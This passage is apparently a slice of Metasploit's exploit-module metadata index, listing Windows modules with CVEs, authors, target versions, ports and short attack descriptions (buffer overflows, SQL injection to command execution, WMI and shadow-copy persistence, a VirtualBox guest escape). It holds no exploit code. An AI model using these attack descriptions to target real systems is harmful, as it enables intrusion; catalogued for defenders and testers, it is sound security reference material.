"full_name": "exploit/windows/local/virtual_box_opengl_escape",
"rank": 200,
"disclosure_date": "2014-03-11",
"type": "exploit",
"author": [
"Francisco Falcon",
"Florian Ledoux",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The\n vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a\n sequence of specially crafted rendering messages, a virtual machine can exploit an out\n of bounds array access to corrupt memory and escape to the host. This module has been\n tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6.",
"references": [
"CVE-2014-0983",
"BID-66133",
"URL-http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities",
"URL-http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/local/virtual_box_opengl_escape.rb",
"is_install_path": true,
"ref_name": "windows/local/virtual_box_opengl_escape",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/vss_persistence": {
"name": "Persistent Payload in Windows Volume Shadow Copy",
"full_name": "exploit/windows/local/vss_persistence",
"rank": 600,
"disclosure_date": "2011-10-21",
"type": "exploit",
"author": [
"Jedediah Rodriguez <Jedi.rodriguez@gmail.com>"
],
"description": "This module will attempt to create a persistent payload in a new volume shadow copy. This is\n based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has\n been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY\n option, the user should need password in order to start session on the target machine.",
"references": [
"URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html",
"URL-http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/vss_persistence.rb",
"is_install_path": true,
"ref_name": "windows/local/vss_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/webexec": {
"name": "WebEx Local Service Permissions Exploit",
"full_name": "exploit/windows/local/webexec",
"rank": 400,
"disclosure_date": "2018-10-09",
"type": "exploit",
"author": [
"Jeff McJunkin <jeff.mcjunkin@gmail.com>"
],
"description": "This module exploits a flaw in the 'webexservice' Windows service, which runs as SYSTEM,\n can be used to run arbitrary commands locally, and can be started by limited users in\n default installations.",
"references": [
"URL-https://webexec.org",
"CVE-2018-15442"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows x86",
"Windows x64"
],
"mod_time": "2018-10-24 16:13:47 +0000",
"path": "/modules/exploits/windows/local/webexec.rb",
"is_install_path": true,
"ref_name": "windows/local/webexec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/wmi": {
"name": "Windows Management Instrumentation (WMI) Remote Command Execution",
"full_name": "exploit/windows/local/wmi",
"rank": 600,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module executes powershell on the remote host using the current\n user credentials or those supplied. Instead of using PSEXEC over TCP\n port 445 we use the WMIC command to start a Remote Procedure Call on\n TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel\n traffic through that session.\n\n The result is similar to psexec but with the added benefit of using\n the session's current authentication token instead of having to know\n a password or hash.\n\n The remote host must be configured to allow remote Windows Management\n Instrumentation.",
"references": [
"CVE-1999-0504",
"OSVDB-3106",
"URL-http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-03-29 18:14:56 +0000",
"path": "/modules/exploits/windows/local/wmi.rb",
"is_install_path": true,
"ref_name": "windows/local/wmi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/wmi_persistence": {
"name": "WMI Event Subscription Persistence",
"full_name": "exploit/windows/local/wmi_persistence",
"rank": 300,
"disclosure_date": "2017-06-06",
"type": "exploit",
"author": [
"Nick Tyrer <@NickTyrer>"
],
"description": "This module will create a permanent WMI event subscription to achieve file-less persistence using one\n of five methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER\n (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing\n must be enabled on the target for this method to work, this can be enabled using \"auditpol.exe /set /subcategory:Logon\n /failure:Enable\"). When these criteria are met a command line event consumer will trigger an encoded powershell payload.\n The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON\n method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS\n method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method\n creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER\n before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command\n (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is\n activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a\n high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations.",
"references": [
"URL-https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf",
"URL-https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/local/wmi_persistence.rb",
"is_install_path": true,
"ref_name": "windows/local/wmi_persistence",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/lotus/domino_http_accept_language": {
"name": "IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow",
"full_name": "exploit/windows/lotus/domino_http_accept_language",
"rank": 200,
"disclosure_date": "2008-05-20",
"type": "exploit",
"author": [
"Fairuzan Roslan <riaf@mysec.org>",
"Earl Marcus klks <Earl Marcus klks@mysec.org>"
],
"description": "This module exploits a stack buffer overflow in IBM Lotus Domino Web Server\n prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP\n request with an Accept-Language header greater than 114 bytes.",
"references": [
"CVE-2008-2240",
"OSVDB-45415",
"BID-29310",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21303057"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Lotus Domino 7.0 on Windows 2003 SP1 English(NX)",
"Lotus Domino 7.0 on Windows 2003 SP2 English(NX)",
"Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)",
"Lotus Domino 8.0 on Windows 2003 SP1 English(NX)",
"Lotus Domino 8.0 on Windows 2003 SP2 English(NX)",
"Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/lotus/domino_http_accept_language.rb",
"is_install_path": true,
"ref_name": "windows/lotus/domino_http_accept_language",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/lotus/domino_icalendar_organizer": {
"name": "IBM Lotus Domino iCalendar MAILTO Buffer Overflow",
"full_name": "exploit/windows/lotus/domino_icalendar_organizer",
"rank": 300,
"disclosure_date": "2010-09-14",
"type": "exploit",
"author": [
"A. Plaskett",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in IBM Lotus Domino iCalendar. By\n sending a long string of data as the \"ORGANIZER;mailto\" header, process \"nRouter.exe\"\n crashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to\n gain arbitrary code execution.\n\n Note: In order to trigger the vulnerable code path, a valid Domino mailbox account\n is needed.",
"references": [
"CVE-2010-3407",
"OSVDB-68040",
"ZDI-10-177",
"URL-http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/",
"URL-http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Lotus Domino 8.5 on Windows 2000 SP4",
"Lotus Domino 8.5 on Windows Server 2003 SP0",
"Lotus Domino 8.5 on Windows Server 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/lotus/domino_icalendar_organizer.rb",
"is_install_path": true,
"ref_name": "windows/lotus/domino_icalendar_organizer",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/lotus/domino_sametime_stmux": {
"name": "IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow",
"full_name": "exploit/windows/lotus/domino_sametime_stmux",
"rank": 200,
"disclosure_date": "2008-05-21",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>",
"riaf <riaf@mysec.org>"
],
"description": "This module exploits a stack buffer overflow in Lotus Domino\\'s Sametime\n Server. By sending an overly long POST request to the Multiplexer\n STMux.exe service we are able to overwrite SEH. Based on the exploit\n by Manuel Santamarina Suarez.",
"references": [
"CVE-2008-2499",
"OSVDB-45610",
"BID-29328",
"ZDI-08-028"
],
"platform": "Windows",
"arch": "x86",
"rport": 1533,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Lotus Sametime 7.5 on Windows Server 2000 SP4",
"Lotus Sametime 7.5 on Windows Server 2003 SP1",
"Lotus Sametime 7.5 on Windows Server 2003 SP2",
"Lotus Sametime 7.5.1 Windows Server 2003 SP2",
"Lotus Sametime 8.0.0 Windows Server 2003 SP2"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/lotus/domino_sametime_stmux.rb",
"is_install_path": true,
"ref_name": "windows/lotus/domino_sametime_stmux",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/lotus/lotusnotes_lzh": {
"name": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)",
"full_name": "exploit/windows/lotus/lotusnotes_lzh",
"rank": 300,
"disclosure_date": "2011-05-24",
"type": "exploit",
"author": [
"binaryhouse.net",
"alino <26alino@gmail.com>"
],
"description": "This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n parsing a malformed, specially crafted LZH file. This vulnerability was\n discovered binaryhouse.net",
"references": [
"CVE-2011-1213",
"OSVDB-72706",
"BID-48018",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904",
"URL-http://www.ibm.com/support/docview.wss?uid=swg21500034"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal",
"Lotus Notes 8.5.2 FP2 / Windows Universal / DEP"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/lotus/lotusnotes_lzh.rb",
"is_install_path": true,
"ref_name": "windows/lotus/lotusnotes_lzh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/lpd/hummingbird_exceed": {
"name": "Hummingbird Connectivity 10 SP5 LPD Buffer Overflow",
"full_name": "exploit/windows/lpd/hummingbird_exceed",
"rank": 200,
"disclosure_date": "2005-05-27",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Hummingbird Connectivity\n 10 LPD Daemon. This module has only been tested against Hummingbird\n Exceed v10 with SP5.",
"references": [
"CVE-2005-1815",
"OSVDB-16957",
"BID-13788"
],
"platform": "Windows",
"arch": "",
"rport": 515,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 English SP0-SP4",
"Windows XP English SP0/SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/lpd/hummingbird_exceed.rb",
"is_install_path": true,
"ref_name": "windows/lpd/hummingbird_exceed",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/lpd/niprint": {
"name": "NIPrint LPD Request Overflow",
"full_name": "exploit/windows/lpd/niprint",
"rank": 400,
"disclosure_date": "2003-11-05",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the\n Network Instrument NIPrint LPD service. Inspired by\n Immunity's VisualSploit :-)",
"references": [
"CVE-2003-1141",
"OSVDB-2774",
"BID-8968",
"URL-http://www.immunitysec.com/documentation/vs_niprint.html"
],
"platform": "Windows",
"arch": "",
"rport": 515,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"NIPrint3.EXE (TDS:0x3a045ff2)",
"Windows XP SP3",
"Windows 7 x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/lpd/niprint.rb",
"is_install_path": true,
"ref_name": "windows/lpd/niprint",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/lpd/saplpd": {
"name": "SAP SAPLPD 6.28 Buffer Overflow",
"full_name": "exploit/windows/lpd/saplpd",
"rank": 400,
"disclosure_date": "2008-02-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40) .\n By sending an overly long argument, an attacker may be able to execute arbitrary\n code.",
"references": [
"CVE-2008-0621",
"OSVDB-41127",
"BID-27613"
],
"platform": "Windows",
"arch": "",
"rport": 515,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"SAPlpd 6.28.0.1 (SAP Release 6.40)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/lpd/saplpd.rb",
"is_install_path": true,
"ref_name": "windows/lpd/saplpd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/lpd/wincomlpd_admin": {
"name": "WinComLPD Buffer Overflow",
"full_name": "exploit/windows/lpd/wincomlpd_admin",
"rank": 400,
"disclosure_date": "2008-02-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in WinComLPD <= 3.0.2.\n By sending an overly long authentication packet to the remote\n administration service, an attacker may be able to execute arbitrary\n code.",
"references": [
"CVE-2008-5159",
"OSVDB-42861",
"BID-27614"
],
"platform": "Windows",
"arch": "",
"rport": 13500,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"WinComLPD 3.0.2.623"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/lpd/wincomlpd_admin.rb",
"is_install_path": true,
"ref_name": "windows/lpd/wincomlpd_admin",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/achat_bof": {
"name": "Achat Unicode SEH Buffer Overflow",
"full_name": "exploit/windows/misc/achat_bof",
"rank": 300,
"disclosure_date": "2014-12-18",
"type": "exploit",
"author": [
"Peter Kasza <peter.kasza@itinsight.hu>",
"Balazs Bucsay <balazs.bucsay@rycon.hu>"
],
"description": "This module exploits a Unicode SEH buffer overflow in Achat. By\n sending a crafted message to the default port 9256/UDP, it's possible to overwrite the\n SEH handler. Even though the exploit is reliable, it depends on timing since there are\n two threads overflowing the stack at the same time. This module has been tested on\n Achat v0.150 running on Windows XP SP3 and Windows 7.",
"references": [
"CWE-121"
],
"platform": "Windows",
"arch": "",
"rport": 9256,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/achat_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/achat_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/actfax_raw_server_bof": {
"name": "ActFax 5.01 RAW Server Buffer Overflow",
"full_name": "exploit/windows/misc/actfax_raw_server_bof",
"rank": 300,
"disclosure_date": "2013-02-05",
"type": "exploit",
"author": [
"Craig Freyman",
"corelanc0d3r",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW\n Server can be used to transfer fax messages without any underlying protocols. To\n note significant fields in the fax being transferred, like the fax number or the\n recipient, ActFax data fields can be used. This module exploits a buffer overflow\n in the handling of the @F506 fields due to the insecure usage of strcpy. This\n module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English).",
"references": [
"OSVDB-89944",
"BID-57789",
"EDB-24467",
"URL-http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ActFax 5.01 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/actfax_raw_server_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/actfax_raw_server_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/agentxpp_receive_agentx": {
"name": "AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow",
"full_name": "exploit/windows/misc/agentxpp_receive_agentx",
"rank": 400,
"disclosure_date": "2010-04-16",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This exploits a stack buffer overflow in the AgentX++ library, as used by\n various applications. By sending a specially crafted request, an attacker can\n execute arbitrary code, potentially with SYSTEM privileges.\n\n This module was tested successfully against master.exe as included with Real\n Network\\'s Helix Server v12. When installed as a service with Helix Server,\n the service runs as SYSTEM, has no recovery action, but will start automatically\n on boot.\n\n This module does not work with NX/XD enabled but could be modified easily to\n do so. The address",
"references": [
"CVE-2010-1318",
"OSVDB-63919",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867"
],
"platform": "Windows",
"arch": "",
"rport": 705,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Helix Server v12 and v13 - master.exe"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/agentxpp_receive_agentx.rb",
"is_install_path": true,
"ref_name": "windows/misc/agentxpp_receive_agentx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ais_esel_server_rce": {
"name": "AIS logistics ESEL-Server Unauth SQL Injection RCE",
"full_name": "exploit/windows/misc/ais_esel_server_rce",
"rank": 600,
"disclosure_date": "2019-03-27",
"type": "exploit",
"author": [
"Manuel Feifel"
],
"description": "This module will execute an arbitrary payload on an \"ESEL\" server used by the\n AIS logistic software. The server typically listens on port 5099 without TLS.\n There could also be a server listening on 5100 with TLS, but port 5099 is\n usually always open.\n The login process is vulnerable to an SQL Injection. Usually an MSSQL Server\n with the 'sa' user is in place.\n\n This module was verified on version 67 but it should also run on lower versions.\n A fixed version was created by AIS in September 2017. However, most systems\n have not been updated.\n\n In regard to the payload, unless there is a closed port in the web server,\n you don't want to use any \"bind\" payload. You want a \"reverse\" payload,\n probably to your port 80 or to any other outbound port allowed on the firewall.\n\n Currently, one delivery method is supported.\n\n This method takes advantage of the Command Stager subsystem. This allows using\n various techniques, such as using a TFTP server, to send the executable. By default\n the Command Stager uses 'wscript.exe' to generate the executable on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.",
"references": [
"CVE-2019-10123"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 5099,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-04-25 18:24:26 +0000",
"path": "/modules/exploits/windows/misc/ais_esel_server_rce.rb",
"is_install_path": true,
"ref_name": "windows/misc/ais_esel_server_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/allmediaserver_bof": {
"name": "ALLMediaServer 0.8 Buffer Overflow",
"full_name": "exploit/windows/misc/allmediaserver_bof",
"rank": 300,
"disclosure_date": "2012-07-04",
"type": "exploit",
"author": [
"motaz reda <motazkhodair@gmail.com>",
"modpr0be <tom@spentera.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability\n is caused by a boundary error within the handling of HTTP requests.\n\n While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't\n reliable across virtual (VMWare, VirtualBox) and physical environments. Because of\n this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default\n DEP is OptIn and AllMediaServer won't run with DEP.",
"references": [
"CVE-2017-17932",
"OSVDB-83889",
"EDB-19625"
],
"platform": "Windows",
"arch": "",
"rport": 888,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ALLMediaServer 0.8 / Windows XP SP3 - English",
"ALLMediaServer 0.8 / Windows 7 SP1 - English"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/misc/allmediaserver_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/allmediaserver_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/altiris_ds_sqli": {
"name": "Symantec Altiris DS SQL Injection",
"full_name": "exploit/windows/misc/altiris_ds_sqli",
"rank": 300,
"disclosure_date": "2008-05-15",
"type": "exploit",
"author": [
"Brett Moore",
"3v0lver"
],
"description": "This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8\n to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize\n numeric input fields in \"UpdateComputer\" notification Requests. In order to spawn a shell,\n several SQL injections are required in close succession, first to enable xp_cmdshell, then\n retrieve the payload via TFTP and finally execute it. The module also has the capability\n to disable or enable local application authentication. In order to work the target system\n must have a tftp client available.",
"references": [
"CVE-2008-2286",
"OSVDB-45313",
"BID-29198",
"URL-http://www.zerodayinitiative.com/advisories/ZDI-08-024"
],
"platform": "Windows",
"arch": "",
"rport": 402,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2003 (with tftp client available)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/altiris_ds_sqli.rb",
"is_install_path": true,
"ref_name": "windows/misc/altiris_ds_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/apple_quicktime_rtsp_response": {
"name": "Apple QuickTime 7.3 RTSP Response Header Buffer Overflow",
"full_name": "exploit/windows/misc/apple_quicktime_rtsp_response",
"rank": 300,
"disclosure_date": "2007-11-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Apple QuickTime 7.3. By sending an overly long\n RTSP response to a client, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-6166",
"OSVDB-40876",
"BID-26549",
"EDB-4648"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"QuickTime 7.3, QuickTime Player 7.3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb",
"is_install_path": true,
"ref_name": "windows/misc/apple_quicktime_rtsp_response",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/asus_dpcproxy_overflow": {
"name": "Asus Dpcproxy Buffer Overflow",
"full_name": "exploit/windows/misc/asus_dpcproxy_overflow",
"rank": 200,
"disclosure_date": "2008-03-21",
"type": "exploit",
"author": [
"Jacopo Cervini"
],
"description": "This module exploits a stack buffer overflow in Asus Dpcproxy version 2.0.0.19.\n It should be vulnerable until version 2.0.0.24.\n Credit to Luigi Auriemma.",
"references": [
"CVE-2008-1491",
"OSVDB-43638",
"BID-28394"
],
"platform": "Windows",
"arch": "",
"rport": 623,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Asus Dpcroxy version 2.00.19 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb",
"is_install_path": true,
"ref_name": "windows/misc/asus_dpcproxy_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/avaya_winpmd_unihostrouter": {
"name": "Avaya WinPMD UniteHostRouter Buffer Overflow",
"full_name": "exploit/windows/misc/avaya_winpmd_unihostrouter",
"rank": 300,
"disclosure_date": "2011-05-23",
"type": "exploit",
"author": [
"AbdulAziz Hariri",
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Avaya WinPMD. The vulnerability\n exists in the UniteHostRouter service, due to the insecure usage of memcpy when\n parsing specially crafted \"To:\" headers. The module has been tested successfully on\n Avaya WinPMD 3.8.2 over Windows XP SP3 and Windows 2003 SP2.",
"references": [
"OSVDB-82764",
"OSVDB-73269",
"BID-47947",
"EDB-18397",
"URL-https://downloads.avaya.com/css/P8/documents/100140122",
"URL-http://secunia.com/advisories/44062"
],
"platform": "Windows",
"arch": "",
"rport": 3217,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Avaya WinPMD 3.8.2 / Windows XP SP3",
"Avaya WinPMD 3.8.2 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb",
"is_install_path": true,
"ref_name": "windows/misc/avaya_winpmd_unihostrouter",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/avidphoneticindexer": {
"name": "Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow",
"full_name": "exploit/windows/misc/avidphoneticindexer",
"rank": 300,
"disclosure_date": "2011-11-29",
"type": "exploit",
"author": [
"vt [nick.freeman <vt [nick.freeman@security-assessment.com]>"
],
"description": "This module exploits a stack buffer overflow in process\n AvidPhoneticIndexer.exe (port 4659), which comes as part of the Avid Media Composer\n 5.5 Editing Suite. This daemon sometimes starts on a different port; if you start\n it standalone it will run on port 4660.",
"references": [
"CVE-2011-5003",
"OSVDB-77376",
"URL-http://www.security-assessment.com/files/documents/advisory/Avid_Media_Composer-Phonetic_Indexer-Remote_Stack_Buffer_Overflow.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 4659,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Professional SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/avidphoneticindexer.rb",
"is_install_path": true,
"ref_name": "windows/misc/avidphoneticindexer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bakbone_netvault_heap": {
"name": "BakBone NetVault Remote Heap Overflow",
"full_name": "exploit/windows/misc/bakbone_netvault_heap",
"rank": 200,
"disclosure_date": "2005-04-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"nolimit.bugtraq <nolimit.bugtraq@ri0tnet.net>"
],
"description": "This module exploits a heap overflow in the BakBone NetVault\n Process Manager service. This code is a direct port of the netvault.c\n code written by nolimit and BuzzDee.",
"references": [
"CVE-2005-1009",
"OSVDB-15234",
"BID-12967"
],
"platform": "Windows",
"arch": "",
"rport": 20031,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 SP4 English",
"Windows XP SP0/SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/bakbone_netvault_heap.rb",
"is_install_path": true,
"ref_name": "windows/misc/bakbone_netvault_heap",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bcaaa_bof": {
"name": "Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow",
"full_name": "exploit/windows/misc/bcaaa_bof",
"rank": 400,
"disclosure_date": "2011-04-04",
"type": "exploit",
"author": [
"Paul Harrington",
"Travis Warren",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),\n which comes as part of the Blue Coat Authentication proxy. Please note that by default,\n this exploit will attempt up to three times in order to successfully gain remote code\n execution (in some cases, it takes as many as five times). This can cause your activity\n to look even more suspicious. To modify the number of exploit attempts, set the\n ATTEMPTS option.",
"references": [
"CVE-2011-5124",
"OSVDB-72095",
"URL-https://kb.bluecoat.com/index?page=content&id=SA55",
"URL-https://seclists.org/bugtraq/2011/Jul/44"
],
"platform": "Windows",
"arch": "",
"rport": 16102,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"BCAAA Version 5.4.6.1.54128"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/misc/bcaaa_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/bcaaa_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/bigant_server": {
